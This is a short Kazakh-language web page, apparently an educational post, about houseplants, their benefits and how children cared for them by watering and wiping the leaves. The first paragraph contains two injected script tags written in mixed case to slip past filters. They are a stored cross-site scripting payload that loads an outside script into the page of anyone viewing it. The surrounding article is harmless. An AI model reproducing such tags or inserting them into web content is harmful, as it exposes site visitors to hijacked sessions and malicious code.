Өсімдіктердің өзі дала және бөлме өсімдігі болып екіге бөлінеді. Бөлме өсімдіктері өмір сәні,табиғат көркі,дәрі-дәрмек.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.01.2021

 Олар топты тек әдемі етіп қоймайды оған көрік беріп, бөлменің ауасын тазартады. Бізге қуаныш сыйлайды, көңіліміз көтеріңкі болады. Барлық өсімдіктер  жарықты жақсы көреді. Өсімдіктер тек әдемілік сыйлап қана қоймай, адамның денсаулығына да жағымды әсер тигізеді. Гүл өскен ортада, тазалық, татулық пен бірліктің, жақсылық пен жомарттықтың болары сөзсіз.  Бөлме өсімдіктеріне құятын судың температурасы бөлме температурасымен шамалас болғаны жөн. Судың шамадан тыс мөлшері өсімдік тамырының шіруіне себепші болады. Балалар  ережелерді сақтай отырып,гүлдердің топырағын қопсытып, гүлдерге керекті мөлшерде су құйды. Сонымен қатар гүлдің жапырақтарын жылы суға малынған матамен  екі жағынан сүртті. Бөлме өсімдіктеріне күтім жасай отырып балалардың табиғатты аялауға, табиғатқа  деген сүйіспеншілік сезімі қалыптасады.

Просмотров: 577


Пікір қосу



Деректерді қолтаңбаға қосу
Текст